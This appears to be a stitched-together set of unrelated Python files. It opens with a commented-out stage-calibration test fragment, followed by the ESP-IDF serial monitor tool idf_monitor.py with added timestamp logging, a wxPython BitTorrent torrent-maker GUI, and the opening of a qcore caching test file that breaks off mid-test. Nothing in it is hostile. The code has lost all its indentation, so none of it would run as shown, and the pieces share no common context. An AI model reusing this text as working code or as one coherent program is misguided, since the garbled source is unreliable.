# # vs.remove(17)
# # vs.remove(26)
# # vs.remove(25)
# # vs.remove(34)
# # vs.remove(35)
# # vs.remove(0)
# # vs.remove(1)
# # vs.remove(2)
# #
# # vs.remove(58)
# # vs.remove(59)
# # vs.remove(60)
# # vs.remove(3)
# # vs.remove(6)
# vs.remove(30)
# # vs = range(50, 60)
# for i in vs:
# # for i in [21, 29, 30]:
#
# h = sm.get_hole(str(i + 1))
# x, y = self._apply_calibration(h)
#
# x = self._add_error(x)
# y = self._add_error(y)
#
# # ca.record_correction(h, x, y)
# # sm.set_hole_correction(h.id, x, y)
# r = random.randint(0, 10)
# # r = 7
# if r > 6:
# self.record_correction(h, x, y, dump=False)
# sm.set_hole_correction(h.id, x, y)
#
# # self._test_interpolate_one()
# self._test_interpolate_all()
#
# def _add_error(self, a):
# # return a
# return a + (0.5 - random.random()) / 2.
#
# def _test_interpolate_one(self):
# sm = self.stage_map
# ca = self.canvas
# h = sm.get_hole('7')
# args = sm.get_interpolated_position('7')
# # print args
# color = (1, 1, 0)
# if args:
# nx = args[0]
# ny = args[1]
# self.record_interpolation(h, nx, ny, color, dump=False)
# ca.invalidate_and_redraw()
#
# def _test_interpolate_all(self):
# sm = self.stage_map
# ca = self.canvas
# colors = [(1, 1, 0), (0, 1, 1), (0, 0.75, 1), (0, 0.5, 1),
# (0, 0.75, 0.75), (0, 0.5, 0.75)
# ]
# for j, color in enumerate(colors[:1]):
# self.info('iteration {}'.format(j + 1))
# s = 0
# for i in range(60, -1, -1):
# h = sm.get_hole(str(i + 1))
# self.set_current_hole(h)
# r = random.randint(0, 10)
# r = 0
# if r > 5:
# nx, ny = self._apply_calibration(h)
# nx = self._add_error(nx)
# ny = self._add_error(ny)
# self.record_correction(h, nx, ny, dump=False)
# sm.set_hole_correction(h.id, nx, ny)
# else:
# kw = dict(cpos=self.center,
# rotation=self.rotation)
# if not self.use_calibration:
# kw['cpos'] = (0, 0)
# kw['rotation'] = 0
#
# args = sm.get_interpolated_position(h.id,
# **kw
# )
# if args:
# s += 1
# nx = args[0]
# ny = args[1]
# self.record_interpolation(h, nx, ny, color, dump=False)
# else:
# if not h.has_correction():
# self.record_uncorrected(h)
# # time.sleep(0.5)
# # do_later(ca.invalidate_and_redraw)
#
# n = 61 - sum([1 for si in sm.sample_holes if si.has_correction()])
# self.info('interpolated holes {} - noncorrected {}'.format(s, n))
#
# if not n or not s:
# break
#
# ca.invalidate_and_redraw()
#
# self.dump()
# self.info('noncorrected holes = {}'.format(n))
#
|
idf_monitor.py
|
#!/usr/bin/env python
#
# esp-idf serial output monitor tool. Does some helpful things:
# - Looks up hex addresses in ELF file with addr2line
# - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R)
# - Run "make flash" (Ctrl-T Ctrl-F)
# - Run "make app-flash" (Ctrl-T Ctrl-A)
# - If gdbstub output is detected, gdb is automatically loaded
#
# Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains elements taken from miniterm "Very simple serial terminal" which
# is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# Originally released under BSD-3-Clause license.
#
from __future__ import print_function, division
import subprocess
import argparse
import codecs
import re
import os
try:
import queue
except ImportError:
import Queue as queue
import time
import datetime
import sys
import serial
import serial.tools.miniterm as miniterm
import threading
import ctypes
file_handler=None
key_description = miniterm.key_description
# Control-key characters
CTRL_A = '\x01'
CTRL_B = '\x02'
CTRL_F = '\x06'
CTRL_H = '\x08'
CTRL_R = '\x12'
CTRL_T = '\x14'
CTRL_RBRACKET = '\x1d' # Ctrl+]
# ANSI terminal codes
ANSI_RED = '\033[1;31m'
ANSI_YELLOW = '\033[0;33m'
ANSI_NORMAL = '\033[0m'
def color_print(message, color):
""" Print a message to stderr with colored highlighting """
sys.stderr.write("%s%s%s\n" % (color, message, ANSI_NORMAL))
def yellow_print(message):
color_print(message, ANSI_YELLOW)
def red_print(message):
color_print(message, ANSI_RED)
__version__ = "1.0"
# Tags for tuples in queues
TAG_KEY = 0
TAG_SERIAL = 1
# regex matches a potential PC value (0x4xxxxxxx)
MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)
DEFAULT_TOOLCHAIN_PREFIX = "xtensa-esp32-elf-"
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
self._thread = None
@property
def alive(self):
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
pass # override to provide cancellation functionality
def run(self):
pass # override for the main thread behaviour
def _run_outer(self):
try:
self.run()
finally:
self._thread = None
def stop(self):
if self._thread is not None:
old_thread = self._thread
self._thread = None
self._cancel()
old_thread.join()
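# Illustrative sketch (not part of the original tool) of how a StoppableThread
# subclass cooperates with stop(): run() polls self.alive plus an Event, and
# _cancel() sets the Event so stop() can join promptly.
#
#     class TickerThread(StoppableThread):
#         def __init__(self):
#             super(TickerThread, self).__init__()
#             self._stop_event = threading.Event()
#
#         def run(self):
#             while self.alive and not self._stop_event.wait(1.0):
#                 yellow_print("tick")
#
#         def _cancel(self):
#             self._stop_event.set()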
class ConsoleReader(StoppableThread):
""" Read input keys from the console and push them to the queue,
until stopped.
"""
def __init__(self, console, event_queue):
super(ConsoleReader, self).__init__()
self.console = console
self.event_queue = event_queue
def run(self):
self.console.setup()
try:
while self.alive:
try:
if os.name == 'nt':
# Windows kludge: because the console.cancel() method doesn't
# seem to work to unblock getkey() on the Windows implementation.
#
# So we only call getkey() if we know there's a key waiting for us.
import msvcrt
while not msvcrt.kbhit() and self.alive:
time.sleep(0.1)
if not self.alive:
break
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if c is not None:
self.event_queue.put((TAG_KEY, c), False)
finally:
self.console.cleanup()
def _cancel(self):
if hasattr(self.console, "cancel"):
self.console.cancel()
elif os.name == 'posix':
# this is the way cancel() is implemented in pyserial 3.1 or newer,
# older pyserial doesn't have this method, hence this hack.
#
# on Windows there is a different (also hacky) fix, applied above.
import fcntl, termios
fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0')
class SerialReader(StoppableThread):
""" Read serial data from the serial port and push to the
event queue, until stopped.
"""
def __init__(self, serial, event_queue):
super(SerialReader, self).__init__()
self.baud = serial.baudrate
self.serial = serial
self.event_queue = event_queue
if not hasattr(self.serial, 'cancel_read'):
# enable timeout for checking alive flag,
# if cancel_read not available
self.serial.timeout = 0.25
def run(self):
if not self.serial.is_open:
self.serial.baudrate = self.baud
self.serial.rts = True # Force an RTS reset on open
self.serial.open()
self.serial.rts = False
try:
while self.alive:
data = self.serial.read(self.serial.in_waiting or 1)
if len(data):
                    current_time = datetime.datetime.now().strftime("[%Y-%m-%d %H:%M:%S]")
                    stamp = "\n" + current_time + ' '
                    if isinstance(data, bytes):
                        stamp = stamp.encode('ascii')
                    # prefix each new line with a timestamp in the saved log and echoed output
                    data = data.replace(stamp[:1], stamp)
                    file_handler.write(data)
                    file_handler.flush()
                    self.event_queue.put((TAG_SERIAL, data), False)
finally:
self.serial.close()
def _cancel(self):
if hasattr(self.serial, 'cancel_read'):
try:
self.serial.cancel_read()
except:
pass
class Monitor(object):
"""
Monitor application main class.
This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this
purpose.
Main difference is that all event processing happens in the main thread, not the worker threads.
"""
def __init__(self, serial_instance, elf_file, make="make", toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol="CRLF"):
super(Monitor, self).__init__()
self.event_queue = queue.Queue()
self.console = miniterm.Console()
if os.name == 'nt':
sys.stderr = ANSIColorConverter(sys.stderr)
self.console.output = ANSIColorConverter(self.console.output)
self.console.byte_output = ANSIColorConverter(self.console.byte_output)
self.serial = serial_instance
self.console_reader = ConsoleReader(self.console, self.event_queue)
self.serial_reader = SerialReader(self.serial, self.event_queue)
self.elf_file = elf_file
self.make = make
self.toolchain_prefix = toolchain_prefix
self.menu_key = CTRL_T
self.exit_key = CTRL_RBRACKET
self.translate_eol = {
"CRLF": lambda c: c.replace(b"\n", b"\r\n"),
"CR": lambda c: c.replace(b"\n", b"\r"),
"LF": lambda c: c.replace(b"\r", b"\n"),
}[eol]
# internal state
self._pressed_menu_key = False
self._read_line = b""
self._gdb_buffer = b""
def main_loop(self):
self.console_reader.start()
self.serial_reader.start()
try:
while self.console_reader.alive and self.serial_reader.alive:
(event_tag, data) = self.event_queue.get()
if event_tag == TAG_KEY:
self.handle_key(data)
elif event_tag == TAG_SERIAL:
self.handle_serial_input(data)
else:
raise RuntimeError("Bad event data %r" % ((event_tag,data),))
finally:
try:
self.console_reader.stop()
self.serial_reader.stop()
except:
pass
sys.stderr.write(ANSI_NORMAL + "\n")
def handle_key(self, key):
if self._pressed_menu_key:
self.handle_menu_key(key)
self._pressed_menu_key = False
elif key == self.menu_key:
self._pressed_menu_key = True
elif key == self.exit_key:
self.console_reader.stop()
self.serial_reader.stop()
else:
try:
key = self.translate_eol(key)
self.serial.write(codecs.encode(key))
except serial.SerialException:
pass # this shouldn't happen, but sometimes port has closed in serial thread
def handle_serial_input(self, data):
# this may need to be made more efficient, as it pushes out a byte
# at a time to the console
for b in data:
self.console.write_bytes(b)
if b == b'\n': # end of line
self.handle_serial_input_line(self._read_line.strip())
self._read_line = b""
else:
self._read_line += b
self.check_gdbstub_trigger(b)
def handle_serial_input_line(self, line):
for m in re.finditer(MATCH_PCADDR, line):
self.lookup_pc_address(m.group())
def handle_menu_key(self, c):
if c == self.exit_key or c == self.menu_key: # send verbatim
self.serial.write(codecs.encode(c))
elif c in [ CTRL_H, 'h', 'H', '?' ]:
red_print(self.get_help_text())
elif c == CTRL_R: # Reset device via RTS
self.serial.setRTS(True)
time.sleep(0.2)
self.serial.setRTS(False)
elif c == CTRL_F: # Recompile & upload
self.run_make("flash")
elif c == CTRL_A: # Recompile & upload app only
self.run_make("app-flash")
else:
red_print('--- unknown menu character {} --'.format(key_description(c)))
def get_help_text(self):
return """
--- idf_monitor ({version}) - ESP-IDF monitor tool
--- based on miniterm from pySerial
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {reset:7} Reset target board via RTS line
--- {make:7} Run 'make flash' to build & flash
--- {appmake:7} Run 'make app-flash' to build & flash app
""".format(version=__version__,
exit=key_description(self.exit_key),
menu=key_description(self.menu_key),
reset=key_description(CTRL_R),
make=key_description(CTRL_F),
appmake=key_description(CTRL_A),
)
def __enter__(self):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.serial_reader.stop()
self.console_reader.stop()
def __exit__(self, *args, **kwargs):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.console_reader.start()
self.serial_reader.start()
def prompt_next_action(self, reason):
self.console.setup() # set up console to trap input characters
try:
red_print("""
--- {}
--- Press {} to exit monitor.
--- Press {} to run 'make flash'.
--- Press {} to run 'make app-flash'.
--- Press any other key to resume monitor (resets target).""".format(reason,
key_description(self.exit_key),
key_description(CTRL_F),
key_description(CTRL_A)))
k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.
while k == CTRL_T:
k = self.console.getkey()
finally:
self.console.cleanup()
if k == self.exit_key:
self.event_queue.put((TAG_KEY, k))
elif k in [ CTRL_F, CTRL_A ]:
self.event_queue.put((TAG_KEY, self.menu_key))
self.event_queue.put((TAG_KEY, k))
def run_make(self, target):
with self:
yellow_print("Running make %s..." % target)
p = subprocess.Popen([self.make,
target ])
try:
p.wait()
except KeyboardInterrupt:
p.wait()
if p.returncode != 0:
self.prompt_next_action("Build failed")
def lookup_pc_address(self, pc_addr):
translation = subprocess.check_output(
["%saddr2line" % self.toolchain_prefix,
"-pfia", "-e", self.elf_file, pc_addr],
cwd=".")
if not "?? ??:0" in translation:
yellow_print(translation)
def check_gdbstub_trigger(self, c):
self._gdb_buffer = self._gdb_buffer[-6:] + c # keep the last 7 characters seen
m = re.match(b"\\$(T..)#(..)", self._gdb_buffer) # look for a gdb "reason" for a break
if m is not None:
try:
chsum = sum(ord(p) for p in m.group(1)) & 0xFF
calc_chsum = int(m.group(2), 16)
except ValueError:
return # payload wasn't valid hex digits
if chsum == calc_chsum:
self.run_gdb()
else:
red_print("Malformed gdb message... calculated checksum %02x received %02x" % (chsum, calc_chsum))
def run_gdb(self):
with self: # disable console control
sys.stderr.write(ANSI_NORMAL)
try:
subprocess.call(["%sgdb" % self.toolchain_prefix,
"-ex", "set serial baud %d" % self.serial.baudrate,
"-ex", "target remote %s" % self.serial.port,
"-ex", "interrupt", # monitor has already parsed the first 'reason' command, need a second
self.elf_file], cwd=".")
except KeyboardInterrupt:
pass # happens on Windows, maybe other OSes
self.prompt_next_action("gdb exited")
def main():
parser = argparse.ArgumentParser("idf_monitor - a serial output monitor for esp-idf")
parser.add_argument(
'--port', '-p',
help='Serial port device',
default=os.environ.get('ESPTOOL_PORT', '/dev/ttyUSB0')
)
parser.add_argument(
'--baud', '-b',
help='Serial port baud rate',
type=int,
default=os.environ.get('MONITOR_BAUD', 115200))
parser.add_argument(
'--make', '-m',
help='Command to run make',
type=str, default='make')
parser.add_argument(
'--toolchain-prefix',
help="Triplet prefix to add before cross-toolchain names",
default=DEFAULT_TOOLCHAIN_PREFIX)
parser.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="End of line to use when sending to the serial port",
default='CRLF')
parser.add_argument(
'elf_file', help='ELF file of application',
type=argparse.FileType('r'))
parser.add_argument(
'--save_file','-sf', help='save the serial file',
type=str)
args = parser.parse_args()
if args.port.startswith("/dev/tty."):
args.port = args.port.replace("/dev/tty.", "/dev/cu.")
yellow_print("--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.")
yellow_print("--- Using %s instead..." % args.port)
serial_instance = serial.serial_for_url(args.port, args.baud,
do_not_open=True)
serial_instance.dtr = False
serial_instance.rts = False
args.elf_file.close() # don't need this as a file
# remove the parallel jobserver arguments from MAKEFLAGS, as any
# parent make is only running 1 job (monitor), so we can re-spawn
# all of the child makes we need (the -j argument remains part of
# MAKEFLAGS)
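    # e.g. MAKEFLAGS=" -j4 --jobserver-fds=6,7" becomes " -j4 " after the substitution below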
try:
makeflags = os.environ["MAKEFLAGS"]
makeflags = re.sub(r"--jobserver[^ =]*=[0-9,]+ ?", "", makeflags)
os.environ["MAKEFLAGS"] = makeflags
except KeyError:
pass # not running a make jobserver
    global file_handler
    # open in binary mode so raw serial bytes can be logged; fall back to os.devnull
    # when --save_file is not given, so SerialReader always has a valid handle
    file_handler = open(args.save_file if args.save_file else os.devnull, 'wb')
monitor = Monitor(serial_instance, args.elf_file.name, args.make, args.toolchain_prefix, args.eol)
yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format(
p=serial_instance))
yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format(
key_description(monitor.exit_key),
key_description(monitor.menu_key),
key_description(monitor.menu_key),
key_description(CTRL_H)))
monitor.main_loop()
if os.name == 'nt':
# Windows console stuff
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h values
FOREGROUND_INTENSITY = 8
FOREGROUND_GREY = 7
# matches the ANSI color change sequences that IDF sends
RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m')
# list mapping the 8 ANSI colors (the indexes) to Windows Console colors
ANSI_TO_WINDOWS_COLOR = [ 0, 4, 2, 6, 1, 5, 3, 7 ]
GetStdHandle = ctypes.windll.kernel32.GetStdHandle
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
class ANSIColorConverter(object):
"""Class to wrap a file-like output stream, intercept ANSI color codes,
and convert them into calls to Windows SetConsoleTextAttribute.
Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses.
Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text
color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the
least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output.
"""
def __init__(self, output):
self.output = output
self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE)
self.matched = b''
def write(self, data):
for b in data:
l = len(self.matched)
if b == '\033': # ESC
self.matched = b
elif (l == 1 and b == '[') or (1 < l < 7):
self.matched += b
if self.matched == ANSI_NORMAL: # reset console
SetConsoleTextAttribute(self.handle, FOREGROUND_GREY)
self.matched = b''
elif len(self.matched) == 7: # could be an ANSI sequence
m = re.match(RE_ANSI_COLOR, self.matched)
if m is not None:
color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))]
if m.group(1) == b'1':
color |= FOREGROUND_INTENSITY
SetConsoleTextAttribute(self.handle, color)
else:
self.output.write(self.matched) # not an ANSI color code, display verbatim
self.matched = b''
else:
self.output.write(b)
self.matched = b''
def flush(self):
self.output.flush()
if __name__ == "__main__":
main()
|
btmaketorrentgui.py
|
#!/usr/bin/env python
# Written by Bram Cohen
# modified for multitracker by John Hoffman
# see LICENSE.txt for license information
import sys
import os
import threading
from BitTornado.BT1.makemetafile import make_meta_file, completedir
from BitTornado.Info import MetaInfo
try:
from wxPython import wx
except:
print 'wxPython is not installed or has not been installed properly.'
sys.exit(1)
wxEVT_INVOKE = wx.wxNewEventType()
def EVT_INVOKE(win, func):
win.Connect(-1, -1, wxEVT_INVOKE, func)
class InvokeEvent(wx.wxPyEvent):
def __init__(self, func, args, kwargs):
super(InvokeEvent, self).__init__()
self.SetEventType(wxEVT_INVOKE)
self.func = func
self.args = args
self.kwargs = kwargs
class DownloadInfo:
def __init__(self):
frame = wx.wxFrame(None, -1, 'BitTorrent Torrent File Maker',
size=wx.wxSize(550, 410))
self.frame = frame
panel = wx.wxPanel(frame, -1)
gridSizer = wx.wxFlexGridSizer(cols=2, rows=2, vgap=0, hgap=8)
gridSizer.Add(wx.wxStaticText(panel, -1, 'make torrent of:'))
b = wx.wxBoxSizer(wx.wxHORIZONTAL)
self.dirCtl = wx.wxTextCtrl(panel, -1, '')
b.Add(self.dirCtl, 1, wx.wxEXPAND)
# b.Add(10, 10, 0, wxEXPAND)
button = wx.wxButton(panel, -1, 'dir', size=(30, 20))
wx.EVT_BUTTON(frame, button.GetId(), self.selectdir)
b.Add(button, 0)
button2 = wx.wxButton(panel, -1, 'file', size=(30, 20))
wx.EVT_BUTTON(frame, button2.GetId(), self.selectfile)
b.Add(button2, 0)
gridSizer.Add(b, 0, wx.wxEXPAND)
gridSizer.Add(wx.wxStaticText(panel, -1, ''))
gridSizer.Add(wx.wxStaticText(panel, -1, ''))
gridSizer.Add(wx.wxStaticText(panel, -1, 'announce url:'))
self.annCtl = wx.wxTextCtrl(panel, -1,
'http://my.tracker:6969/announce')
gridSizer.Add(self.annCtl, 0, wx.wxEXPAND)
gridSizer.Add(wx.wxStaticText(panel, -1, ''))
gridSizer.Add(wx.wxStaticText(panel, -1, ''))
a = wx.wxFlexGridSizer(cols=1)
a.Add(wx.wxStaticText(panel, -1, 'announce list:'))
a.Add(wx.wxStaticText(panel, -1, ''))
abutton = wx.wxButton(panel, -1, 'copy\nannounces\nfrom\ntorrent',
size=(50, 70))
wx.EVT_BUTTON(frame, abutton.GetId(), self.announcecopy)
a.Add(abutton, 0, wx.wxEXPAND)
gridSizer.Add(a, 0, wx.wxEXPAND)
self.annListCtl = wx.wxTextCtrl(
panel, -1, '\n\n\n\n\n', wx.wxPoint(-1, -1), (400, 120),
wx.wxTE_MULTILINE | wx.wxHSCROLL | wx.wxTE_DONTWRAP)
gridSizer.Add(self.annListCtl, -1, wx.wxEXPAND)
gridSizer.Add(wx.wxStaticText(panel, -1, ''))
exptext = wx.wxStaticText(
panel, -1, 'a list of announces separated by commas or whitespace '
'and on several lines -\ntrackers on the same line will be tried '
'randomly, and all the trackers on one line\nwill be tried before '
'the trackers on the next line.')
exptext.SetFont(wx.wxFont(6, wx.wxDEFAULT, wx.wxNORMAL, wx.wxNORMAL,
False))
gridSizer.Add(exptext)
gridSizer.Add(wx.wxStaticText(panel, -1, ''))
gridSizer.Add(wx.wxStaticText(panel, -1, ''))
gridSizer.Add(wx.wxStaticText(panel, -1, 'piece size:'))
self.piece_length = wx.wxChoice(
panel, -1, choices=['automatic', '2MiB', '1MiB', '512KiB',
'256KiB', '128KiB', '64KiB', '32KiB'])
self.piece_length_list = [0, 21, 20, 19, 18, 17, 16, 15]
self.piece_length.SetSelection(0)
gridSizer.Add(self.piece_length)
gridSizer.Add(wx.wxStaticText(panel, -1, ''))
gridSizer.Add(wx.wxStaticText(panel, -1, ''))
gridSizer.Add(wx.wxStaticText(panel, -1, 'comment:'))
self.commentCtl = wx.wxTextCtrl(panel, -1, '')
gridSizer.Add(self.commentCtl, 0, wx.wxEXPAND)
gridSizer.AddGrowableCol(1)
border = wx.wxBoxSizer(wx.wxVERTICAL)
border.Add(gridSizer, 0,
wx.wxEXPAND | wx.wxNORTH | wx.wxEAST | wx.wxWEST, 25)
b2 = wx.wxButton(panel, -1, 'make')
# border.Add(10, 10, 1, wxEXPAND)
border.Add(b2, 0, wx.wxALIGN_CENTER | wx.wxSOUTH, 20)
wx.EVT_BUTTON(frame, b2.GetId(), self.complete)
panel.SetSizer(border)
panel.SetAutoLayout(True)
# panel.DragAcceptFiles(True)
# EVT_DROP_FILES(panel, self.selectdrop)
def selectdir(self, x):
dl = wx.wxDirDialog(
self.frame, style=wx.wxDD_DEFAULT_STYLE | wx.wxDD_NEW_DIR_BUTTON)
if dl.ShowModal() == wx.wxID_OK:
self.dirCtl.SetValue(dl.GetPath())
def selectfile(self, x):
dl = wx.wxFileDialog(self.frame, 'Choose file or directory to use', '',
'', '', wx.wxOPEN)
if dl.ShowModal() == wx.wxID_OK:
self.dirCtl.SetValue(dl.GetPath())
def selectdrop(self, x):
print x
# list = x.m_files
self.dirCtl.SetValue(x[0])
def announcecopy(self, x):
dl = wx.wxFileDialog(self.frame, 'Choose .torrent file to use', '', '',
'*.torrent', wx.wxOPEN)
if dl.ShowModal() == wx.wxID_OK:
try:
metainfo = MetaInfo.read(dl.GetPath())
self.annCtl.SetValue(metainfo['announce'])
if 'announce-list' in metainfo:
self.annListCtl.SetValue(
'\n'.join(', '.join(tier) for tier in
metainfo['announce-list']) + '\n' * 3)
else:
self.annListCtl.SetValue('')
except:
return
def getannouncelist(self):
annList = filter(bool, self.annListCtl.GetValue().split('\n'))
return [filter(bool, tier.replace(',', ' ').split())
for tier in annList]
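    # Illustrative parse (hypothetical trackers): the text
    #   "http://t1/announce, http://t2/announce\nhttp://backup/announce"
    # yields [['http://t1/announce', 'http://t2/announce'], ['http://backup/announce']]
    # -- one inner list per line, as described by the note shown in the dialog above.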
def complete(self, x):
if self.dirCtl.GetValue() == '':
dlg = wx.wxMessageDialog(
self.frame, message='You must select a\n file or directory',
caption='Error', style=wx.wxOK | wx.wxICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
params = {
'piece_size_pow2': self.piece_length_list[
self.piece_length.GetSelection()]
}
annlist = self.getannouncelist()
if len(annlist) > 0:
params['real_announce_list'] = annlist
comment = self.commentCtl.GetValue()
if comment != '':
params['comment'] = comment
try:
CompleteDir(self.dirCtl.GetValue(), self.annCtl.GetValue(), params)
except:
print_exc()
from traceback import print_exc
class CompleteDir:
def __init__(self, d, a, params):
self.d = d
self.a = a
self.params = params
self.flag = threading.Event()
self.separatetorrents = False
if os.path.isdir(d):
self.choicemade = threading.Event()
frame = wx.wxFrame(None, -1, 'BitTorrent make torrent',
size=(1, 1))
self.frame = frame
panel = wx.wxPanel(frame, -1)
gridSizer = wx.wxFlexGridSizer(cols=1, vgap=8, hgap=8)
gridSizer.AddGrowableRow(1)
gridSizer.Add(wx.wxStaticText(
panel, -1, 'Do you want to make a separate .torrent'), 0,
wx.wxALIGN_CENTER)
gridSizer.Add(wx.wxStaticText(
panel, -1, 'for every item in this directory?'), 0,
wx.wxALIGN_CENTER)
gridSizer.Add(wx.wxStaticText(panel, -1, ''))
b = wx.wxFlexGridSizer(cols=3, hgap=10)
yesbut = wx.wxButton(panel, -1, 'Yes')
def saidyes(e, self=self):
self.frame.Destroy()
self.separatetorrents = True
self.begin()
wx.EVT_BUTTON(frame, yesbut.GetId(), saidyes)
b.Add(yesbut, 0)
nobut = wx.wxButton(panel, -1, 'No')
def saidno(e, self=self):
self.frame.Destroy()
self.begin()
wx.EVT_BUTTON(frame, nobut.GetId(), saidno)
b.Add(nobut, 0)
cancelbut = wx.wxButton(panel, -1, 'Cancel')
def canceled(e, self=self):
self.frame.Destroy()
wx.EVT_BUTTON(frame, cancelbut.GetId(), canceled)
b.Add(cancelbut, 0)
gridSizer.Add(b, 0, wx.wxALIGN_CENTER)
border = wx.wxBoxSizer(wx.wxHORIZONTAL)
border.Add(gridSizer, 1, wx.wxEXPAND | wx.wxALL, 4)
panel.SetSizer(border)
panel.SetAutoLayout(True)
frame.Show()
border.Fit(panel)
frame.Fit()
else:
self.begin()
def begin(self):
if self.separatetorrents:
frame = wx.wxFrame(None, -1, 'BitTorrent make directory',
size=wx.wxSize(550, 250))
else:
frame = wx.wxFrame(None, -1, 'BitTorrent make torrent',
size=wx.wxSize(550, 250))
self.frame = frame
panel = wx.wxPanel(frame, -1)
gridSizer = wx.wxFlexGridSizer(cols=1, vgap=15, hgap=8)
if self.separatetorrents:
self.currentLabel = wx.wxStaticText(panel, -1,
'checking file sizes')
else:
self.currentLabel = wx.wxStaticText(
panel, -1, 'building ' + self.d + '.torrent')
gridSizer.Add(self.currentLabel, 0, wx.wxEXPAND)
self.gauge = wx.wxGauge(panel, -1, range=1000, style=wx.wxGA_SMOOTH)
gridSizer.Add(self.gauge, 0, wx.wxEXPAND)
gridSizer.Add((10, 10), 1, wx.wxEXPAND)
self.button = wx.wxButton(panel, -1, 'cancel')
gridSizer.Add(self.button, 0, wx.wxALIGN_CENTER)
gridSizer.AddGrowableRow(2)
gridSizer.AddGrowableCol(0)
g2 = wx.wxFlexGridSizer(cols=1, vgap=15, hgap=8)
g2.Add(gridSizer, 1, wx.wxEXPAND | wx.wxALL, 25)
g2.AddGrowableRow(0)
g2.AddGrowableCol(0)
panel.SetSizer(g2)
panel.SetAutoLayout(True)
wx.EVT_BUTTON(frame, self.button.GetId(), self.done)
wx.EVT_CLOSE(frame, self.done)
EVT_INVOKE(frame, self.onInvoke)
frame.Show(True)
threading.Thread(target=self.complete).start()
def complete(self):
try:
if self.separatetorrents:
completedir(self.d, self.a, self.params, self.flag,
self.valcallback, self.filecallback)
else:
make_meta_file(self.d, self.a, self.params, self.flag,
self.valcallback, progress_percent=1)
if not self.flag.isSet():
self.currentLabel.SetLabel('Done!')
self.gauge.SetValue(1000)
self.button.SetLabel('Close')
self.frame.Refresh()
except (OSError, IOError) as e:
self.currentLabel.SetLabel('Error!')
self.button.SetLabel('Close')
dlg = wx.wxMessageDialog(
self.frame, message='Error - ' + str(e), caption='Error',
style=wx.wxOK | wx.wxICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
def valcallback(self, amount):
self.invokeLater(self.onval, [amount])
def onval(self, amount):
self.gauge.SetValue(int(amount * 1000))
def filecallback(self, f):
self.invokeLater(self.onfile, [f])
def onfile(self, f):
self.currentLabel.SetLabel(
'building ' + os.path.join(self.d, f) + '.torrent')
def onInvoke(self, event):
if not self.flag.isSet():
apply(event.func, event.args, event.kwargs)
def invokeLater(self, func, args=[], kwargs={}):
if not self.flag.isSet():
wx.wxPostEvent(self.frame, InvokeEvent(func, args, kwargs))
def done(self, event):
self.flag.set()
self.frame.Destroy()
class btWxApp(wx.wxApp):
def OnInit(self):
d = DownloadInfo()
d.frame.Show(True)
self.SetTopWindow(d.frame)
return True
if __name__ == '__main__':
btWxApp().MainLoop()
|
test_caching.py
|
# Copyright 2016 Quora, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from qcore.caching import (
LRUCache, miss, cached_per_instance, memoize, memoize_with_ttl,
LazyConstant, ThreadLocalLazyConstant, lazy_constant, not_computed, lru_cache
)
from qcore.asserts import assert_eq, assert_ne, assert_is, assert_in, assert_not_in, AssertRaises
import qcore
import threading
try:
import mock
from mock import MagicMock, call
import cPickle as pickle
except ImportError:
from unittest import mock
from unittest.mock import MagicMock, call
import pickle
class TestLazyConstant(object):
def test_decorator(self):
self.is_computed = False
@lazy_constant
def test_function():
assert_is(False, self.is_computed, 'test_function has been called more than once')
self.is_computed = True
return 42
assert_eq(42, test_function())
assert_eq(42, test_function())
assert self.is_computed, 'test_function has not been called'
def test_not_compute(self):
lazy_constant = LazyConstant(lambda: not_computed)
assert_is(None, lazy_constant.compute())
assert_is(None, lazy_constant.get_value())
def test_clear(self):
lazy_constant = LazyConstant(qcore.utime)
